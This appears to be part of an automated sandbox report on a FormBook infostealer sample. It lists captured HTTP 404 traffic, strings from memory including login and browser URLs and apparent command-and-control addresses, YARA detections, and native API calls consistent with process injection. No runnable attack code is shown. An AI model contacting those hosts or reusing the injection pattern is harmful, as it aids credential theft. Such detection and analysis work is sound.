                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.1.29cache-control: no-cache, privatecontent-type: text/html; charset=UTF-8content-length: 6603date: Sat, 11 Jan 2025 00:22:40 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 21 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 76 38 2e 30 2e 31 20 7c 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 7c 20 67 69 74 68 75 62 2e 63 6f 6d 2f 6e 65 63 6f 6c 61 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 2a 2f 68 74 6d 6c 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 7d 61 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 63 6f 64 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 6f 73 70 61 63 65 2c 6d 6f 6e 6f 73 70 61 63 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 7d 5b 68 69 64 64 65 6e 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 79 73 74 65 6d 2d 75 69 2c 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 52 6f 62 6f 74 6f 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 41 72 69 61 6c 2c 4e 6f 74 6f 20 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 2c 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 2c 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 2c 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 2c 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 7d 2a 2c 3a 61 66 74 65 72 2c 3a 62 65 66 6f 72 65 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 62 6f 72 64 65 72 3a 30 20 73 6f 6c 69 64 20 23 65 32 65 38 66 30 7d 61 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 69 6e 68 65 72 69 74 7d 63 6f 64 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4d 65 6e 6c 6f 2c 4d 6f 6e 61 63 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 4c 69 62 65 72 61 74 69 6f 6e 20 4d 6f 6e 6f 2c 43 6f 75 72 69 65 72 20 4e 65 77 2c 6d 6f 6e 6f 73 70 61 63 65 7d 73 76 67 2c 76 69 64 65 6f 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 76 69 64 65 6f 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 61 75 74 6f 7d 2e 62 67 2d 77 68 69 74 65 7b 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 00:23:27 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 00:23:30 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 00:23:33 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 00:23:35 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: ysdBLufRFxAq.exe, 00000009.00000002.3937654032.0000000004D14000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.whisperart.net
                Source: ysdBLufRFxAq.exe, 00000009.00000002.3937654032.0000000004D14000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.whisperart.net/rfcw/
                Source: regini.exe, 00000007.00000003.2647175730.0000000008078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: regini.exe, 00000007.00000003.2647175730.0000000008078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: regini.exe, 00000007.00000003.2647175730.0000000008078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: regini.exe, 00000007.00000003.2647175730.0000000008078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: regini.exe, 00000007.00000003.2647175730.0000000008078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: regini.exe, 00000007.00000003.2647175730.0000000008078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: regini.exe, 00000007.00000003.2647175730.0000000008078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: regini.exe, 00000007.00000002.3938423784.0000000006580000.00000004.00000800.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3936711834.000000000489E000.00000004.10000000.00040000.00000000.sdmp, ysdBLufRFxAq.exe, 00000009.00000002.3936126173.000000000342E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://kb.fastpanel.direct/troubleshoot/
                Source: regini.exe, 00000007.00000002.3935086502.00000000030CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: regini.exe, 00000007.00000002.3935086502.00000000030CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: regini.exe, 00000007.00000002.3935086502.00000000030CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: regini.exe, 00000007.00000002.3935086502.00000000030CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: regini.exe, 00000007.00000002.3935086502.00000000030CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: regini.exe, 00000007.00000002.3935086502.00000000030CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: regini.exe, 00000007.00000003.2636052578.0000000007FA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: regini.exe, 00000007.00000002.3936711834.0000000004BC2000.00000004.10000000.00040000.00000000.sdmp, ysdBLufRFxAq.exe, 00000009.00000002.3936126173.0000000003752000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.cssa.auction/rjvg/?e6sH8=tUIUitDW424aYZRkIy55Xux7Uvf
                Source: regini.exe, 00000007.00000003.2647175730.0000000008078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: regini.exe, 00000007.00000002.3936711834.0000000004EE6000.00000004.10000000.00040000.00000000.sdmp, ysdBLufRFxAq.exe, 00000009.00000002.3936126173.0000000003A76000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: regini.exe, 00000007.00000003.2647175730.0000000008078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 5.2.BcF3o0Egke.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.BcF3o0Egke.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.3937654032.0000000004CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3935912832.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3935958759.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2441172068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2475970970.0000000004A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3935959813.0000000003090000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2443326901.0000000001970000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0042C8D3 NtClose,5_2_0042C8D3
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C2B60 NtClose,LdrInitializeThunk,5_2_015C2B60
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_015C2DF0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_015C2C70
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C35C0 NtCreateMutant,LdrInitializeThunk,5_2_015C35C0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C4340 NtSetContextThread,5_2_015C4340
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C4650 NtSuspendThread,5_2_015C4650
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C2BF0 NtAllocateVirtualMemory,5_2_015C2BF0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C2BE0 NtQueryValueKey,5_2_015C2BE0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C2B80 NtQueryInformationFile,5_2_015C2B80
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C2BA0 NtEnumerateValueKey,5_2_015C2BA0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C2AD0 NtReadFile,5_2_015C2AD0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C2AF0 NtWriteFile,5_2_015C2AF0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C2AB0 NtWaitForSingleObject,5_2_015C2AB0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C2D10 NtMapViewOfSection,5_2_015C2D10
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C2D00 NtSetInformationFile,5_2_015C2D00
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C2D30 NtUnmapViewOfSection,5_2_015C2D30
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C2DD0 NtDelayExecution,5_2_015C2DD0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C2DB0 NtEnumerateKey,5_2_015C2DB0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C2C60 NtCreateKey,5_2_015C2C60
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C2C00 NtQueryInformationProcess,5_2_015C2C00
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C2CC0 NtQueryVirtualMemory,5_2_015C2CC0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C2CF0 NtOpenProcess,5_2_015C2CF0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C2CA0 NtQueryInformationToken,5_2_015C2CA0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C2F60 NtCreateProcessEx,5_2_015C2F60
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C2F30 NtCreateSection,5_2_015C2F30
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C2FE0 NtCreateFile,5_2_015C2FE0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C2F90 NtProtectVirtualMemory,5_2_015C2F90
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C2FB0 NtResumeThread,5_2_015C2FB0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C2FA0 NtQuerySection,5_2_015C2FA0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C2E30 NtWriteVirtualMemory,5_2_015C2E30
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C2EE0 NtQueueApcThread,5_2_015C2EE0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C2E80 NtReadVirtualMemory,5_2_015C2E80
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C2EA0 NtAdjustPrivilegesToken,5_2_015C2EA0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C3010 NtOpenDirectoryObject,5_2_015C3010
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C3090 NtSetValueKey,5_2_015C3090
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C39B0 NtGetContextThread,5_2_015C39B0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C3D70 NtOpenThread,5_2_015C3D70
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C3D10 NtOpenProcessToken,5_2_015C3D10
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03674340 NtSetContextThread,LdrInitializeThunk,7_2_03674340
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03674650 NtSuspendThread,LdrInitializeThunk,7_2_03674650
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03672B60 NtClose,LdrInitializeThunk,7_2_03672B60
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03672BE0 NtQueryValueKey,LdrInitializeThunk,7_2_03672BE0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03672BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_03672BF0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03672BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_03672BA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03672AF0 NtWriteFile,LdrInitializeThunk,7_2_03672AF0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03672AD0 NtReadFile,LdrInitializeThunk,7_2_03672AD0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03672F30 NtCreateSection,LdrInitializeThunk,7_2_03672F30
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03672FE0 NtCreateFile,LdrInitializeThunk,7_2_03672FE0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03672FB0 NtResumeThread,LdrInitializeThunk,7_2_03672FB0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03672EE0 NtQueueApcThread,LdrInitializeThunk,7_2_03672EE0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03672E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_03672E80
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03672D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_03672D30
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03672D10 NtMapViewOfSection,LdrInitializeThunk,7_2_03672D10
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_03672DF0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03672DD0 NtDelayExecution,LdrInitializeThunk,7_2_03672DD0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03672C60 NtCreateKey,LdrInitializeThunk,7_2_03672C60
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03672C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_03672C70
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03672CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_03672CA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036735C0 NtCreateMutant,LdrInitializeThunk,7_2_036735C0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036739B0 NtGetContextThread,LdrInitializeThunk,7_2_036739B0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03672B80 NtQueryInformationFile,7_2_03672B80
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03672AB0 NtWaitForSingleObject,7_2_03672AB0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03672F60 NtCreateProcessEx,7_2_03672F60
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03672FA0 NtQuerySection,7_2_03672FA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03672F90 NtProtectVirtualMemory,7_2_03672F90
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03672E30 NtWriteVirtualMemory,7_2_03672E30
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03672EA0 NtAdjustPrivilegesToken,7_2_03672EA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03672D00 NtSetInformationFile,7_2_03672D00
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03672DB0 NtEnumerateKey,7_2_03672DB0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03672C00 NtQueryInformationProcess,7_2_03672C00
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03672CF0 NtOpenProcess,7_2_03672CF0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03672CC0 NtQueryVirtualMemory,7_2_03672CC0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03673010 NtOpenDirectoryObject,7_2_03673010
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03673090 NtSetValueKey,7_2_03673090
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03673D70 NtOpenThread,7_2_03673D70
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_03673D10 NtOpenProcessToken,7_2_03673D10
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E293F0 NtCreateFile,7_2_02E293F0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E296E0 NtClose,7_2_02E296E0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E29640 NtDeleteFile,7_2_02E29640
